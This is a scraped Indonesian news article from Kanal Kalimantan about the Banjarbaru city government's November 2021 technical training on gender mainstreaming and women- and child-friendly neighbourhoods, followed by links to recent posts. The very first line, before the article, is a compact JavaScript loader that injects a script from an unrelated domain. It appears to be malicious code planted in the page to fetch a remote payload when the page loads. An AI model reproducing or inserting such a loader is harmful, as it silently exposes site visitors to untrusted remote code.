(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Komitmen Wujudkan Kesetaraan Gender, Pemko Banjarbaru Gelar Bimtek Demi Perjuangkan Hak Perempuan


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru berkomitmen mendorong untuk merealisasikan hak perempuan di semua bidang pembangunan. Hal itu demi mewujudkan adanya kesetaraan gender atau menghilangkan diskriminasi terhadap perempuan sebagaimana Instruksi Presiden Nomor 9 Tahun 2000 tentang pengarusatamaan gender (PUG).

Komitmen ini kembali ditegaskan Staf Ahli Bidang Politik dan Hukum, Lesa Fahriani, saat membuka bimbingan teknis (Bimtek) PUG untuk tim evaluasi dan sosialisasi kelurahan Ramah perempuan dan anak di Aula Gawi Sabarataan, Jumat (5/11/2021).

Menurutnya, komitmen Pemko Banjarbaru dalam mewujudkan kesetaraan gender bukanlah hal yang mustahil. Apalagi setelah Kota Banjarbaru ketika menerima Anugerah Parahita Ekapraya (APE) Tingkat Madya tahun 2020.

Sekadar informasi, APE sendiri merupakan penghargaan dari Kementrian Pemberdayaan Perempuan dan Perlindungan Anak kepada Kabupaten/Kota bagi pemerintah daerah dalam strategi PUG dan komitmen kepala daerah dalam mewujudkan kesetaraan dan keadilan gender di berbagai sektor pembangunan.

“Tentu melalui kegiatan ini diharapkan semua dapat bersama-sama mendukung dan mengimplementasikan PUG dalam keseharian. Serta membangun kecamatan dan kelurahan di Kota Banjarbaru menjadi ramah perempuan dan peduli anak,” ujar Lesa.

Melalui Bimtek ini, ditambahkan Lesa juga dapat mengevaluasi implementasi untum seluruh SKPD di lingkup pemko Banjarbaru yang akan dilaksanakan Desember mendatang. “Evaluasi ini diharapkan bisa menjadi titik awal kepada seluruh SKPD dapat bersinergi dengan baik, dalam upaya mewujudkan kesetaraan dan keadilan gender,” tambahnya.

Di tempat yang sama, Kepala Dinas Pengendalian Penduduk Keluarga Berencana Pengendalian Masyarakat Perempuan dan Perlindungan Anak (Dinas Dalduk KB, PMP dan PA) Kota Banjarbaru, Mahrina Noor menyampaikan bahwa sesuai Instruksi Presiden Nomor 9 Tahun 2000, pengarusutamaan gender merupakan strategi untuk mewujudkan kesetaraan dan keadilan gender atau menghilangkan adanya diskriminasi.

“Hal inilah yang melatarbelakangi bimtek kali ini dilaksanakan. Dinas Pegendalian Penduduk KB PMP dan PA Kota Banjarbaru mengadakan Bimtek Pengarusutamaan Gender (PUG) untuk Tim Evaluasi PUG dan Sosialisasi Kelurahan Ramah Perempuan dan Peduli Anak untuk seluruh SKPD,” ucapnya.

Atas komitmen Pemko Banjarbaru dalam mewujudkan kesetaraan gender turut mendapatkan apresiasi oleh Kepala Dinas Pemberdayaan Perempuan dan Perlindungan Anak Provinsi Kalimantan Selatan, Husnul Hatimah.

“Kami mengapresiasi pelaksanaan kegiatan Bimtek PUG untuk Tim Evaluasi PUG dan Sosialisasi Kelurahan Ramah Perempuan dan Peduli Anak di Kota Banjarbaru,” katanya.

Kegiatan PUG sekaligus Sosialisasi Menuju Kecamatan dan Kelurahan Ramah Perempuan dan Peduli Anak dibagi menjadi 3 batch. Batch 1, Sosialisasi Menuju Kecamatan dan Kelurahan Ramah Perempuan dan Peduli Anak untuk camat dan Lurah Se Kota Banjarbaru, Forum Anak Daerah , TP.PKK dan Forkomda PMP3A.

Jadwal selanjutnya yakni Batch 2, Bimtek PUG untuk Tim Evaluasi PUG dan Fasilitator PUG yang dilaksanakan pada 8-9 November. Peserta yang berjumlah 30 orang adalah Anggota Tim Evaluasi PUG Kota Banjarbaru yang di bentuk berdasarkan Surat Keputusan Wali Kota Banjarbaru dan fasilitator PUG Kota Banjarbaru.

Sedangkan, untuk Batch 3 bertemakan Bimtek Perencanaan Penganggaran Responsif Gender (PPRG) untuk seluruh pejabat Kasubag Perencanaan di lingkup Pemko Banjarbaru akan dilaksanakan pada 29-30 November mendatang. (Kanalkalimantan.com/ibnu)

 


Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

5 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

15 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

15 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

16 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

17 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

18 jam ago

This website uses cookies.